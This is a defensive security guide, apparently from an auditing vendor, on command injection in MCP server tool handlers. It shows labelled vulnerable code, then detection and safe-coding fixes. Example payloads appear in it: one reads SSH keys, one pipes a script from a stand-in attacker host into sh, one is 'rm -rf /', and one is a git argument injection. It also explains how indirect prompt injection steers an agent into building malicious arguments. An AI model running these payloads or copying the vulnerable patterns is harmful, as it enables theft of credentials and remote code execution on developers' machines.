Topic: mcp server command injection

MCP server command injection — when tool arguments become shell commands

Command injection in an MCP server is straightforward in mechanism and severe in consequence: a tool handler receives an argument from a language model, constructs a shell command using that argument, and executes it. Whatever the argument contains — a legitimate filename, or ; rm -rf / — the shell will interpret it. Command-exec findings are present in 43% of the SkillAudit corpus, making it one of the most common patterns we identify. Combined with the fact that most MCP servers run with local filesystem access on the developer's own machine, it's also the most consequential class we track.

TL;DR

Command injection in MCP servers happens when a tool handler passes a LLM-provided argument to a shell command — via template string interpolation in exec(), argv constructed from split input, or the shell: true option on spawn(). MCP amplifies the risk: the agent calls the tool automatically, no human reviews the argument before execution, and the server typically runs on the local machine with broad filesystem permissions. Detection is reliable via static AST analysis (which is what SkillAudit's security axis does). Prevention is also reliable: always use spawn() or execFile() with an array argv, never pass a shell string, and validate each argument against an allowlist of safe values before the command executes.

How command injection works in MCP servers

The Model Context Protocol doesn't execute shell commands — it routes tool calls between an agent and a server process. The server process, however, often does execute shell commands: to run git, grep, ffmpeg, pandoc, or any other CLI tool the author wanted to expose through the MCP interface. This is a common and legitimate pattern. The injection risk emerges at the point where the server constructs the command string using input it received from the agent.

Node.js's child_process.exec() and Python's subprocess.run(shell=True) both execute their argument by spawning a shell — /bin/sh -c "..." on Unix, cmd.exe /c "..." on Windows. The shell interprets the string, which means it interprets shell metacharacters: ;, &&, ||, $(), backticks, pipes, redirects. If any of those characters appear in the argument the server passes to the command string, the shell executes the additional commands they introduce.

The LLM-provided argument can contain those characters because the LLM is constructing the argument from its context window, which may include attacker-controlled content — a file the agent read, a URL it fetched, a user message that included an injection payload. The agent doesn't validate what it passes; it generates the argument in response to instructions, and those instructions may have been crafted to produce a malicious argument.

Three common patterns

Pattern 1 — Template-string interpolation in exec()

The most common pattern: a template literal (or Python f-string) that interpolates the tool argument directly into the command string passed to exec().

// TypeScript — VULNERABLE
server.tool('git_log', { path: z.string() }, async ({ path }) => {
  const { stdout } = await exec(`git log --oneline -- ${path}`);
  return { content: [{ type: 'text', text: stdout }] };
});

# Python — VULNERABLE
@server.tool()
async def read_file(path: str) -> str:
    result = subprocess.run(f"cat {path}", shell=True, capture_output=True, text=True)
    return result.stdout

If path is README.md; cat ~/.ssh/id_rsa, the shell executes both commands. If it's README.md $(curl -s attacker.com/payload | sh), it executes an arbitrary remote script. The template-string construction is the injection point — anything that puts user input into a shell string without escaping it is vulnerable by definition.

Pattern 2 — Array argv built from split input

A subtler pattern: the server uses spawn() (which is safer by default) but constructs the argv array by splitting a tool argument on spaces — effectively re-creating the shell parsing behavior that spawn() was meant to avoid.

// VULNERABLE — splitting argument re-creates the shell parsing problem
server.tool('run_command', { args: z.string() }, async ({ args }) => {
  const argv = args.split(' ');  // agent controls each element of argv
  const { stdout } = await execFile('/usr/bin/git', argv);
  return { content: [{ type: 'text', text: stdout }] };
});

With no shell involved, the agent can't use shell metacharacters. But it can still pass unexpected arguments to the binary: --upload-pack=malicious-command, --exec-path=/tmp/malicious, or simply arguments the server didn't intend to expose. The argv split re-creates a surface that allowlisting is needed to close.

Pattern 3 — shell: true option with constructed string

The most explicit form: spawn() called with { shell: true } and a constructed command string. This option tells Node.js to execute the command through the shell rather than directly — it's equivalent to exec() for injection purposes.

// VULNERABLE — shell: true converts spawn() back into exec() behavior
server.tool('convert_file', { input: z.string(), format: z.string() }, async ({ input, format }) => {
  const { stdout } = await spawn('ffmpeg', ['-i', input, `-c:v`, format, 'output.mp4'], { shell: true });
  return { content: [{ type: 'text', text: stdout }] };
});

With shell: true, the arguments array is joined and passed to the shell as a string. The input or format arguments can inject additional shell commands through the same mechanism as pattern 1.

Why MCP amplifies the risk

Command injection has existed as a vulnerability class for decades. What's new with MCP is the combination of three factors that makes injection more likely to succeed and harder to catch before it does:

Automated invocation — no human reviews the argument before execution. In a traditional web form, a user types a value, submits it, and a developer can review their logs to see what inputs arrive at command-building code. In an MCP context, the LLM constructs the argument and the tool handler executes in milliseconds, with no human step in between. An injected argument that arrives at exec() is already running before anyone could have noticed.

Indirect injection via tool responses. The argument the LLM provides doesn't have to come from the user's original message. It can be constructed from content the agent processed in earlier tool calls — a file it read, a page it fetched, an API response it parsed. An attacker who can place content in any of those sources can craft an injection payload that the LLM will incorporate into a subsequent tool argument. This is the indirect prompt injection pathway: the attacker controls neither the user's message nor the tool call directly, but they control the content the LLM reads, and that's enough.

Local filesystem access. Most MCP servers in the corpus run on the developer's local machine with the permissions of the developer's process — meaning they can read the developer's SSH keys, environment variables, credentials, and source code. The blast radius of a successful command injection against a local MCP server is at minimum full read access to the developer's home directory, and potentially arbitrary code execution with the developer's privileges.

Detection via AST analysis

Command injection in MCP servers is reliably detectable via static AST (abstract syntax tree) analysis. The pattern has a specific shape: a variable introduced as a tool handler parameter that appears inside a template literal or string concatenation that's then passed to exec(), spawn({ shell: true }), or equivalent. Tree-sitter and other AST parsers can express this as a query that identifies the taint path from handler argument to shell sink.

SkillAudit's security axis runs this AST analysis as part of the static scan. It identifies the tool handler, the argument name, and the specific line where the argument reaches the shell sink. The finding report names the file and line so the author can navigate directly to the vulnerable code without searching.

The static check also catches the shell: true pattern by looking for spawn() calls with that option anywhere in the module — even if the argument construction isn't immediately obvious from context — and flags them for manual review if an argument from a tool handler's parameter list is in scope at the call site.

Prevention — spawn with array argv and argument allowlists

// SAFE — spawn() with array argv, never shell: true
// Argument validated against allowlist before reaching the command

const ALLOWED_FORMATS = new Set(['mp4', 'webm', 'mp3', 'wav']);
const SAFE_FILENAME = /^[\w.\-]+$/;

server.tool('convert_file',
  {
    input: z.string().max(256).regex(SAFE_FILENAME),
    format: z.enum(['mp4', 'webm', 'mp3', 'wav'])
  },
  async ({ input, format }) => {
    if (!ALLOWED_FORMATS.has(format)) throw new Error('Format not allowed');
    if (!SAFE_FILENAME.test(input)) throw new Error('Filename not allowed');

    // Array argv — shell never interprets these as a string
    const proc = spawn('ffmpeg', ['-i', input, '-c:v', 'libx264', `output.${format}`], {
      shell: false  // explicit — this is the safe default but worth stating
    });

    const stdout = await collectOutput(proc, { maxBytes: 32_000, timeoutMs: 30_000 });
    return { content: [{ type: 'text', text: stdout }] };
  }
);

Three mitigations stack here: the Zod schema uses z.enum() for the format argument — eliminating the injection surface for that argument entirely because the value must be one of a finite set of safe strings. The filename argument is validated against a strict regex that allows only word characters, dots, and hyphens. And the command is executed with spawn() using an array argv with shell: false — the OS executes the binary directly with the argument list, without a shell to interpret metacharacters.

# Python — SAFE equivalent
import subprocess, re, shlex
from typing import Literal

SAFE_FILENAME = re.compile(r'^[\w.\-]+$')

@server.tool()
async def convert_file(
    input: str,
    format: Literal['mp4', 'webm', 'mp3', 'wav']
) -> str:
    if not SAFE_FILENAME.match(input):
        raise ValueError("Filename not allowed")
    # List form of args — subprocess never invokes a shell
    result = subprocess.run(
        ['ffmpeg', '-i', input, '-c:v', 'libx264', f'output.{format}'],
        capture_output=True, text=True, timeout=30
    )
    return result.stdout[:32_000]

In Python, the equivalent is subprocess.run() with a list argument and no shell=True. Pydantic's Literal type enforces the format allowlist at the parameter level. The timeout parameter prevents unbounded execution.

Related